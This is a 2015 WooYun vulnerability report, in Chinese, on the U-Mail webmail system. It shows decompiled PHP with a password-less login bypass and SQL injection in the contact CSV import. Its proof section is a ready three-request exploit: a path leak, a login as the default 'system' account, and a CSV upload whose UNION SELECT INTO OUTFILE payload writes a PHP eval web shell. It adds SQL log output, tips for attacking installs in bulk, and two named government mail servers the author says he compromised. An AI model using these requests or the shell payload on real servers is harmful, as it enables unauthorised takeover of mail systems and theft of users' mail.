U-Mail邮件系统批量getshell（真正无限制，无需普通帐号）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-093049

漏洞标题：U-Mail邮件系统批量getshell（真正无限制，无需普通帐号）

漏洞作者： Ano_Tom

提交时间：2015-01-21 09:24

修复时间：2015-04-21 09:26

公开时间：2015-04-21 09:26

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-01-21：细节已通知厂商并且等待厂商处理中
2015-01-26：厂商已经确认，细节仅向厂商公开
2015-01-29：细节向第三方安全合作伙伴开放
2015-03-22：细节向核心白帽子及相关领域专家公开
2015-04-01：细节向普通白帽子公开
2015-04-11：细节向实习白帽子公开
2015-04-21：细节向公众公开

简要描述：

该邮件系统存在任意用户登录、且存在注入，从而可以无限制完美getshell（getshell过程只需简单三个请求）。疯狗，这个不遭雷劈的话，等着被爆菊吧

详细说明：

1.邮件系统介绍
1）官方下载地址：http://www.comingchina.com/html/downloads/
2）版本：最新版V9.8.57
3）测试环境：Windows Server 2003+IIS6.0+官方默认软件
4）使用案例：非常之多，政府类也较多。http://www.comingchina.com/html/case/ OR Google "Powered by U-Mail"
漏洞文件
/fast/default/operates.php

require_once( LIB_PATH."Mailbox.php" );
require_once( LIB_PATH."Domain.php" );
$Mailbox = Mailbox::getinstance( );
$Domain = Domain::getinstance( );
if ( ACTION == "login" )
{
		$url_success = "index.php";
		$url_failure = "/webmail/";
		$wc_info = array( );
		$wc_info['mailbox'] = strtolower( trim( $_POST['mailbox'] ) );//需要提交的用户名
		$wc_info['link'] = trim( $_POST['link'] );
		$wc_info['charset'] = trim( $_POST['charset'] );
		$wc_info['theme'] = trim( $_POST['theme'] );
		$wc_info['language'] = strtolower( trim( $_POST['language'] ) );
		if ( !$wc_info['link'] )
		{
				redirect( $url_failure, "参数错误！" );
		}
		$url_check = $wc_info['link']."&view=status";
		get_url_data( $url_check );
		list( $username, $domain_name ) = explode( "@", $wc_info['mailbox'] );
		$arr_tmp = $Domain->getDomainByName( $domain_name, "DomainID,DomainName", 0 );//获得域名
		$domain_id = $arr_tmp['DomainID'];
		$userinfo = $Mailbox->getMailboxByName( $domain_id, $username, "UserID,Password,FullName,MailDir,MaxNetFileSpace", 0 );
		$arr_tmp = $Domain->getPurchaseByDomainID( $domain_id, "id,corpname", 0 );
		$company = $arr_tmp['corpname'];
		set_session( "is_login", TRUE );
		set_session( "worldclient", $wc_info );
		set_session( "domain_id", $domain_id );
		set_session( "domain_name", $domain_name );
		set_session( "user_id", $userinfo['UserID'] );
		set_session( "email", $wc_info['mailbox'] );
		set_session( "fullname", $userinfo['FullName'] );
		set_session( "password", $userinfo['Password'] );
		set_session( "maildir", $userinfo['MailDir'] );
		set_session( "company_name", $company );
		set_session( "language", $wc_info['language'] );
		set_session( "username", $username );
		redirect( $url_success );
}

get_url_data()函数文件/admin/include/base.func.php
代码为

function get_url_data( $_obfuscate_Il8i, $_obfuscate_5E5Av0svlQÿÿ = 1 )
{
		$_obfuscate_u_cÿ = curl_init( );
		curl_setopt( $_obfuscate_u_cÿ, CURLOPT_URL, $_obfuscate_Il8i );
		curl_setopt( $_obfuscate_u_cÿ, CURLOPT_SSL_VERIFYPEER, FALSE );
		curl_setopt( $_obfuscate_u_cÿ, CURLOPT_SSL_VERIFYHOST, FALSE );
		curl_setopt( $_obfuscate_u_cÿ, CURLOPT_RETURNTRANSFER, TRUE );
		curl_setopt( $_obfuscate_u_cÿ, CURLOPT_CONNECTTIMEOUT, $_obfuscate_5E5Av0svlQÿÿ );
		$_obfuscate_6RYLWQÿÿ = curl_exec( $_obfuscate_u_cÿ );
		curl_close( $_obfuscate_u_cÿ );
		return $_obfuscate_6RYLWQÿÿ;
}

没什么用处，然后
$arr_tmp = $Domain->getDomainByName( $domain_name, "DomainID,DomainName", 0 );代码所在文件为
/admin/lib/Domains.php
代码为

public function getDomainByName( $_obfuscate_yTDviRDH, $_obfuscate_tjILu7ZH = "*", $_obfuscate_ySeUHBwÿ = FALSE )
		{
				$_obfuscate_IRFhnYwÿ = "DomainName='".$_obfuscate_yTDviRDH."'";
				$_obfuscate_6RYLWQÿÿ = $this->getone_domain( $_obfuscate_IRFhnYwÿ, $_obfuscate_tjILu7ZH, $_obfuscate_ySeUHBwÿ );
				return $_obfuscate_6RYLWQÿÿ;
		}

获取域名的id，然后
$userinfo = $Mailbox->getMailboxByName( $domain_id, $username, "UserID,Password,FullName,MailDir,MaxNetFileSpace", 0 );
对应文件为
/admin/lib/Mailbox.php

public function getMailboxByName( $_obfuscate_AkPSczrCIu40, $_obfuscate_3gn_eQÿÿ, $_obfuscate_tjILu7ZH = "*", $_obfuscate_ySeUHBwÿ = FALSE )
		{
				$_obfuscate_AkPSczrCIu40 = intval( $_obfuscate_AkPSczrCIu40 );
				$_obfuscate_IRFhnYwÿ = "DomainID='".$_obfuscate_AkPSczrCIu40."' AND Mailbox='".$_obfuscate_3gn_eQÿÿ."'";
				$_obfuscate_6RYLWQÿÿ = $this->getone_mailbox( $_obfuscate_IRFhnYwÿ, $_obfuscate_tjILu7ZH, $_obfuscate_ySeUHBwÿ );
				return $_obfuscate_6RYLWQÿÿ;
		}

直接使用用户名执行了sql查询，将获取用户查询结果，并未进行password的判断，而直接set_session( "is_login", TRUE );从而登录成功，可以继续执行其他的方法，因而只要找一处缺陷方法即可

登录成功后，如图，发现是未显示状态，但是函数都是可以执行了，因为有sessionid

然后，漏洞文件为
/fast/pab/module/o_contact.php 代码为

if ( ACTION == "contact-import" )
{
		$url = make_link( "pab", "view", "index" );
		$import_file = $_FILES['import_file'];//获取文件
		$import_group = $_POST['import_group'];
		$import_mode = $_POST['import_mode'];
		$file_path = $_FILES['import_file']['tmp_name'];
		$fp = @fopen( $file_path, "r" );
		if ( !$fp )
		{
				redirect( $url, "无法打开文件！" );
		}
		$i = 0;
		$file_fields = array( );
		while ( !feof( $fp ) )
		{
				$line = iconv( "GBK", "UTF-8", trim( fgets( $fp, 4096 ) ) );
				if ( $i == 0 )
				{
						$field_map = $PAB->getExportFieldMap( );
						$tmp_field_arr = explode( ",", trim( $line ) );
						foreach ( $tmp_field_arr as $tmp_field )
						{
								$tmp_field = trim( $tmp_field );
								$is_find = FALSE;
								foreach ( $field_map as $key => $field )
								{
										if ( !( $tmp_field == $field ) || !( $tmp_field == "\"".$field."\"" ) )
										{
												continue;
										}
										$file_fields[] = $key;
										$is_find = TRUE;
										break;
								}
								if ( !$is_find )
								{
										$file_fields[] = "";
								}
						}
				}
				else
				{
						$data = array( );
						$line_arr = explode( ",", $line );
						foreach ( $line_arr as $j => $val )
						{
								preg_match( "/\"(.+?)\"/", $val, $arr_tmp );
								$val = $arr_tmp[1] ? $arr_tmp[1] : $val;
								if ( !$val && !$file_fields[$j] && !( $val != "\"\"" ) )
								{
										$data[$file_fields[$j]] = $val;//从文件读取的参数存至数组
								}
						}
						if ( !$data )
						{
						}
						else
						{
								$data['updated'] = date( "Y-m-d H:i:s" );
								$contact = $PAB->getContactByMail( $user_id, $data['pref_email'], "contact_id", 0 );//产生注入
								if ( $contact )
								{
										do
										{
												if ( !( $import_mode == "ignore" ) )
												{
														$where = "contact_id='".$contact['contact_id']."'";
														$result = $PAB->update_contact( $data, $where, 0 );
														if ( !$result )
														{
																redirect( $url, "更新数据失败！" );
														}
														if ( $import_group && $PAB->checkMap( $user_id, $import_group, $contact['contact_id'], 0 ) )
														{
																$contact_id = $contact['contact_id'];
																break;
																break;
														}
												}
										}
										else
										{
												$data['user_id'] = $user_id;
												$contact_id = $PAB->add_contact( $data, 0 );
												if ( $contact_id )
												{
														break;
												}
												redirect( $url, "导入数据失败！" );
										} while ( 0 );
								}
								if ( $import_group )
								{
										$res = $PAB->addMap( $user_id, $import_group, $contact_id, 0 );
								}
						}
				}
				++$i;
		}
		fclose( $fp );
		redirect( $url, "导入数据成功！" );
}

getContactByMail函数为/admin/lib/PAB.php

public function getContactByMail( $_obfuscate_nQNptTJPgÿÿ, $_obfuscate_ae6UFRQÿ, $_obfuscate_tjILu7ZH = "*", $_obfuscate_ySeUHBwÿ = FALSE )
		{		//fuck getshell
				$_obfuscate_IRFhnYwÿ = "user_id='".$_obfuscate_nQNptTJPgÿÿ."' AND pref_email='".$_obfuscate_ae6UFRQÿ."'";
				$_obfuscate_6RYLWQÿÿ = $this->getone_contact( $_obfuscate_IRFhnYwÿ, $_obfuscate_tjILu7ZH, $_obfuscate_ySeUHBwÿ );
				return $_obfuscate_6RYLWQÿÿ;
		}

getshell分析见上个漏洞，getshell过程为，找到一个用户名，执行如下

其请求为

然后将PHPSESSID放入cookie，执行如下请求即可getshell。exp中的web地址获取方式为访问/webmail/client/mail/module/test.php即可，无需登录，如图，同时该邮件系统的默认数据库连接帐号umail默认是有FILE权限的，从而可以getshell

POST /webmail/fast/pab/index.php?module=operate&action=contact-import HTTP/1.1
Host: mail.fuck.com
Proxy-Connection: keep-alive
Content-Length: 814
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://mail.fuck.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary77HSkP3chJHBAPXs
Referer: http://mail.fuck.com/webmail/client/pab/index.php?module=view&action=index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: PHPSESSID=2283f21dcf01afc8c707124764fe6bb6
------WebKitFormBoundary77HSkP3chJHBAPXs
Content-Disposition: form-data; name="import_file"; filename="getshell.csv"
Content-Type: application/vnd.ms-excel
Ãû,µç×ÓÓÊ¼þµØÖ·,Ö÷Òªµç»°,ÉúÈÕ,×¡Õ¬µç»°,ÉÌÎñµç»°,ÓÃ»§ 1,ÓÃ»§ 2,×¡Õ¬µØÖ· ¹ú¼Ò/µØÇø,×¡Õ¬µØÖ· Ê¡/ÊÐ/×ÔÖÎÇø,×¡Õ¬µØÖ· ÊÐ/ÏØ,×¡Õ¬µØÖ· ½ÖµÀ,×¡Õ¬µØÖ· ÓÊÕþ±àÂë,ÍøÒ³,µ¥Î»,²¿ÃÅ,Ö°Îñ,ÉÌÎñµØÖ· ½ÖµÀ,ÉÌÎñµØÖ· ÓÊÕþ±àÂë,ÉÌÎñ´«Õæ,µç×ÓÓÊ¼þ 2 µØÖ·,µç×ÓÓÊ¼þ 3 µØÖ·,¸½×¢
hello1,hello' AND 1=2 UNION SELECT '<?php eval($_POST[1]);' INTO OUTFILE 'C:\\umail\\WorldClient\\html\\hahahahaha.php'#,,0000-00-00,,,,,,,,,,,,,,,,,,,
------WebKitFormBoundary77HSkP3chJHBAPXs
Content-Disposition: form-data; name="import_group"
15
------WebKitFormBoundary77HSkP3chJHBAPXs
Content-Disposition: form-data; name="import_mode"
ignore
------WebKitFormBoundary77HSkP3chJHBAPXs--

获得执行的sql语句为

150121  0:53:08	 1986 Connect	umail@localhost on 
		 1986 Query	SET NAMES 'UTF8'
		 1986 Init DB	umail
		 1986 Query	SELECT contact_id FROM pab_contact WHERE user_id='7' AND pref_email='hello' AND 1=2 UNION SELECT '<?php eval($_POST[1]);' INTO OUTFILE 'C:\\umail\\WorldClient\\html\\hahahahaha.php'#' LIMIT 1
		 1986 Query	INSERT INTO pab_contact SET `fullname`='hello1',`pref_email`='hello' AND 1=2 UNION SELECT '<?php eval($_POST[1]);' INTO OUTFILE 'C:\\umail\\WorldClient\\html\\hahahahaha.php'#',`birthday`='0000-00-00',`updated`='2015-01-21 00:53:08',`user_id`='7'
		 1986 Quit

所以综上，我们只需要知道一个邮箱用户名即可getshell，那如何批量？只需要找个默认存在的帐号即可，数据库如图

默认是存在一个system帐号的，安装默认生成的，因而可以直接批量。

漏洞证明：

批量EXP就不写了吧，
三个请求，一个获得web路径，一个登录获得phpsessionid（[email protected]即可），一个getshell请求，啥也不提了，随便提交了一个
第一步，获得物理路径请求

GET /webmail/client/mail/module/test.php HTTP/1.1
Host: mail.fuck.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive

第二步，请求为，响应中获得PHPSESSID

POST /webmail/fast/index.php?module=operate&action=login HTTP/1.1
Host: mail.fuck.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
[email protected]&link=?

第三步，将PHPSESSID和路径写入如下请求，执行getshell EXP即可

POST /webmail/fast/pab/index.php?module=operate&action=contact-import HTTP/1.1
Host: mail.fuck.com
Proxy-Connection: keep-alive
Content-Length: 553
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://mail.fuck.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary69fA5vmkAMLB8gmA
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: PHPSESSID=53ad27d7a64bd68d372be8a94985606d
------WebKitFormBoundary69fA5vmkAMLB8gmA
Content-Disposition: form-data; name="import_file"; filename="getshell.csv"
Content-Type: application/vnd.ms-excel
Ãû,µç×ÓÓÊ¼þµØÖ·
hello1,hello' AND 1=2 UNION SELECT '<?php eval($_POST[1]);' INTO OUTFILE 'c:\\umail\\WorldClient\\html\\shell.php'#
------WebKitFormBoundary69fA5vmkAMLB8gmA
Content-Disposition: form-data; name="import_group"
10
------WebKitFormBoundary69fA5vmkAMLB8gmA
Content-Disposition: form-data; name="import_mode"
ignore
------WebKitFormBoundary69fA5vmkAMLB8gmA--

随便测试了两个
中华人民共和国广东海事局 http://www.gdmsa.gov.cn:3000/webmail/login9.php轻轻松松getshell
广州市民防办公室http://mail.gzccad.gov.cn/webmail/login9.php

mask 区域

1.http://**.**.**/webmail/anonymous.php_
2.http://**.**.**/webmail/anonymous.php_
3.http://**.**.**/webmail/anonymous.php_
4.http://**.**.**/webmail/anonymous.php_
5.http://**.**.**/webmail/anonymous.php_
6.http://**.**.**/webmail/anonymous.php_
7.http://**.**.**/webmail/anonymous.php_
8.http://**.**.**/webmail/anonymous.php_
9.http://**.**.**/webmail/anonymous.php_
10.http://**.**.**/webmail/anonymous.php_
11.http://**.**.**/webmail/anonymous.php_
12.http://**.**.**/webmail/anonymous.php_
13.http://**.**.**/webmail/anonymous.php_
14.http://**.**.**/webmail/anonymous.php_
15.http://**.**.**/webmail/anonymous.php_
16.http://**.**.**/webmail/anonymous.php_
17.http://**.**.**/webmail/anonymous.php_
18.http://**.**.**/webmail/anonymous.php_
19.http://**.**.**/webmail/anonymous.php_
20.http://**.**.**/webmail/anonymous.php_
21.http://**.**.**/webmail/anonymous.php_
22.http://**.**.**/webmail/anonymous.php_
23.http://**.**.**/webmail/anonymous.php_
24.http://**.**.**/webmail/anonymous.php_
25.http://**.**.**/webmail/anonymous.php_
26.http://**.**.**/webmail/anonymous.php_
27.http://**.**.**/webmail/anonymous.php_
28.http://**.**.**/webmail/anonymous.php_
29.http://**.**.**/webmail/anonymous.php_
30.http://**.**.**/webmail/anonymous.php_
31.http://**.**.**/webmail/anonymous.php_
32.http://**.**.**/webmail/anonymous.php_
33.http://**.**.**/webmail/anonymous.php_
34.http://**.**.**/webmail/anonymous.php_
35.http://**.**.**/webmail/anonymous.php_
36.http://**.**.**/webmail/anonymous.php_
37.http://**.**.**/webmail/anonymous.php_
38.http://**.**.**/webmail/anonymous.php_
39.http://**.**.**/webmail/anonymous.php_
40.http://**.**.**/webmail/anonymous.php_
41.http://**.**.**/webmail/anonymous.php_
42.http://**.**.**/webmail/anonymous.php_
43.http://**.**.**/webmail/anonymous.php_
44.http://**.**.**/webmail/anonymous.php_
45.http://**.**.**/webmail/anonymous.php_
46.http://**.**.**/webmail/anonymous.php_
47.http://**.**.**/webmail/anonymous.php_
48.http://**.**.**/webmail/anonymous.php_
49.http://**.**.**/webmail/anonymous.php_
50.http://**.**.**/webmail/anonymous.php_
51.http://**.**.**/webmail/anonymous.php_
52.http://**.**.**/webmail/anonymous.php_
53.http://**.**.**/webmail/anonymous.php_
54.http://**.**.**/webmail/anonymous.php_
55.http://**.**.**/webmail/anonymous.php_
56.http://**.**.**/webmail/anonymous.php_
57.http://**.**.**/webmail/anonymous.php_
58.http://**.**.**/webmail/anonymous.php_
59.http://**.**.**/webmail/anonymous.php_
60.http://**.**.**/webmail/anonymous.php_
61.http://**.**.**/webmail/anonymous.php_
62.http://**.**.**/webmail/anonymous.php_
63.http://**.**.**/webmail/anonymous.php_
64.http://**.**.**/webmail/anonymous.php_
65.http://**.**.**/webmail/anonymous.php_
66.http://**.**.**/webmail/anonymous.php_
67.http://**.**.**/webmail/anonymous.php_
68.http://**.**.**/webmail/anonymous.php_
69.http://**.**.**/webmail/anonymous.php_
70.http://**.**.**/webmail/anonymous.php_
71.http://**.**.**/webmail/anonymous.php_
72.http://**.**.**/webmail/anonymous.php_
73.http://**.**.**/webmail/anonymous.php_
74.http://**.**.**/webmail/anonymous.php_
75.http://**.**.**/webmail/anonymous.php_
76.http://**.**.**/webmail/anonymous.php_
77.http://**.**.**/webmail/anonymous.php_
78.http://**.**.**/webmail/anonymous.php_
79.http://**.**.**/webmail/anonymous.php_
80.http://**.**.**/webmail/anonymous.php_
81.http://**.**.**/webmail/anonymous.php_
82.http://**.**.**/webmail/anonymous.php_
83.http://**.**.**/webmail/anonymous.php_
84.http://**.**.**/webmail/anonymous.php_
85.http://**.**.**/webmail/anonymous.php_
86.http://**.**.**/webmail/anonymous.php_
87.http://**.**.**/webmail/anonymous.php_
88.http://**.**.**/webmail/anonymous.php_
89.http://**.**.**/webmail/anonymous.php_
90.http://**.**.**/webmail/anonymous.php_
91.http://**.**.**/webmail/anonymous.php_
92.http://**.**.**/webmail/anonymous.php_
93.http://**.**.**/webmail/anonymous.php_
94.http://**.**.**/webmail/anonymous.php_
95.http://**.**.**/webmail/anonymous.php_
96.http://**.**.**/webmail/anonymous.php_
97.http://**.**.**/webmail/anonymous.php_
98.http://**.**.**/webmail/anonymous.php_
99.http://**.**.**/webmail/anonymous.php_
100.http://**.**.**/webmail/anonymous.php_
101.http://**.**.**/webmail/anonymous.php_
102.http://**.**.**/webmail/anonymous.php_
103.http://**.**.**/webmail/anonymous.php_
104.http://**.**.**/webmail/anonymous.php_
105.http://**.**.**/webmail/anonymous.php_
106.http://**.**.**/webmail/anonymous.php_
107.http://**.**.**/webmail/anonymous.php_
108.http://**.**.**/webmail/anonymous.php_
109.http://**.**.**/webmail/anonymous.php_
110.http://**.**.**/webmail/anonymous.php_
111.http://**.**.**/webmail/anonymous.php_
112.http://**.**.**/webmail/anonymous.php_
113.http://**.**.**/webmail/anonymous.php_
114.http://**.**.**/webmail/anonymous.php_
115.http://**.**.**/webmail/anonymous.php_
116.http://**.**.**/webmail/anonymous.php_
117.http://**.**.**/webmail/anonymous.php_
118.http://**.**.**/webmail/anonymous.php_
119.http://**.**.**/webmail/anonymous.php_
120.http://**.**.**/webmail/anonymous.php_
121.http://**.**.**/webmail/anonymous.php_
122.http://**.**.**/webmail/anonymous.php_
123.http://**.**.**/webmail/anonymous.php_
124.http://**.**.**/webmail/anonymous.php_
125.http://**.**.**/webmail/anonymous.php_
126.http://**.**.**/webmail/anonymous.php_
127.http://**.**.**/webmail/anonymous.php_
128.http://**.**.**/webmail/anonymous.php_
129.http://**.**.**/webmail/anonymous.php_
130.http://**.**.**/webmail/anonymous.php_
131.http://**.**.**/webmail/anonymous.php_
132.http://**.**.**/webmail/anonymous.php_
133.http://**.**.**/webmail/anonymous.php_
134.http://**.**.**/webmail/anonymous.php_
135.http://**.**.**/webmail/anonymous.php_
136.http://**.**.**/webmail/anonymous.php_
137.http://**.**.**/webmail/anonymous.php_
138.http://**.**.**/webmail/anonymous.php_
139.http://**.**.**/webmail/anonymous.php_
140.http://**.**.**/webmail/anonymous.php_
141.http://**.**.**/webmail/anonymous.php_
142.http://**.**.**/webmail/anonymous.php_
143.http://**.**.**/webmail/anonymous.php_
144.http://**.**.**/webmail/anonymous.php_
145.http://**.**.**/webmail/anonymous.php_
146.http://**.**.**/webmail/anonymous.php_
147.http://**.**.**/webmail/anonymous.php_
148.http://**.**.**/webmail/anonymous.php_
149.http://**.**.**/webmail/anonymous.php_
150.http://**.**.**/webmail/anonymous.php_
151.http://**.**.**/webmail/anonymous.php_
152.http://**.**.**/webmail/anonymous.php_
153.http://**.**.**/webmail/anonymous.php_
154.http://**.**.**/webmail/anonymous.php_
155.http://**.**.**/webmail/anonymous.php_
156.http://**.**.**/webmail/anonymous.php_
157.http://**.**.**/webmail/anonymous.php_
158.http://**.**.**/webmail/anonymous.php_
159.http://**.**.**/webmail/anonymous.php_
160.http://**.**.**/webmail/anonymous.php_
161.http://**.**.**/webmail/anonymous.php_
162.http://**.**.**/webmail/anonymous.php_
163.http://**.**.**/webmail/anonymous.php_
164.http://**.**.**/webmail/anonymous.php_
165.http://**.**.**/webmail/anonymous.php_
166.http://**.**.**/webmail/anonymous.php_
167.http://**.**.**/webmail/anonymous.php_
168.http://**.**.**/webmail/anonymous.php_
169.http://**.**.**/webmail/anonymous.php_
170.http://**.**.**/webmail/anonymous.php_
171.http://**.**.**/webmail/anonymous.php_
172.http://**.**.**/webmail/anonymous.php_
173.http://**.**.**/webmail/anonymous.php_
174.http://**.**.**/webmail/anonymous.php_
175.http://**.**.**/webmail/anonymous.php_
176.http://**.**.**/webmail/anonymous.php_
177.http://**.**.**/webmail/anonymous.php_
178.http://**.**.**/webmail/anonymous.php_
179.http://**.**.**/webmail/anonymous.php_
180.http://**.**.**/webmail/anonymous.php_
181.http://**.**.**/webmail/anonymous.php_
182.http://**.**.**/webmail/anonymous.php_
183.http://**.**.**/webmail/anonymous.php_
184.http://**.**.**/webmail/anonymous.php_
185.http://**.**.**/webmail/anonymous.php_
186.http://**.**.**/webmail/anonymous.php_
187.http://**.**.**/webmail/anonymous.php_
188.http://**.**.**/webmail/anonymous.php_
189.http://**.**.**/webmail/anonymous.php_
190.http://**.**.**/webmail/anonymous.php_
191.http://**.**.**/webmail/anonymous.php_
192.http://**.**.**/webmail/anonymous.php_
193.http://**.**.**/webmail/anonymous.php_
194.http://**.**.**/webmail/anonymous.php_
195.http://**.**.**/webmail/anonymous.php_
196.http://**.**.**/webmail/anonymous.php_
197.http://**.**.**/webmail/anonymous.php_
198.http://**.**.**/webmail/anonymous.php_
199.http://**.**.**/webmail/anonymous.php_
200.http://**.**.**/webmail/anonymous.php_
201.http://**.**.**/webmail/anonymous.php_
202.http://**.**.**/webmail/anonymous.php_
203.http://**.**.**/webmail/anonymous.php_
204.http://**.**.**/webmail/anonymous.php

修复方案：

登录验证、注入问题、爆路径问题、FILE权限与邮件业务的取舍均衡问题
http://pan.baidu.com/s/1gdvipFX 密码: zee5

版权声明：转载请注明来源 Ano_Tom@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2015-01-26 08:09

厂商回复：

CNVD确认并复现所述情况,与近期的同个软件漏洞一并后续联系软件生产厂商.同时根据测试用例,将分别下发给多个CNCERT分中心进行协调处置. rank 40

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-093049

漏洞标题：U-Mail邮件系统批量getshell（真正无限制，无需普通帐号）

相关厂商：U-Mail

漏洞作者： Ano_Tom

提交时间：2015-01-21 09:24

修复时间：2015-04-21 09:26

公开时间：2015-04-21 09:26

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Ano_Tom@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-093049

漏洞标题：U-Mail邮件系统批量getshell（真正无限制，无需普通帐号）

相关厂商：U-Mail

漏洞作者： Ano_Tom

提交时间：2015-01-21 09:24

修复时间：2015-04-21 09:26

公开时间：2015-04-21 09:26

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-093049"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Ano_Tom@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：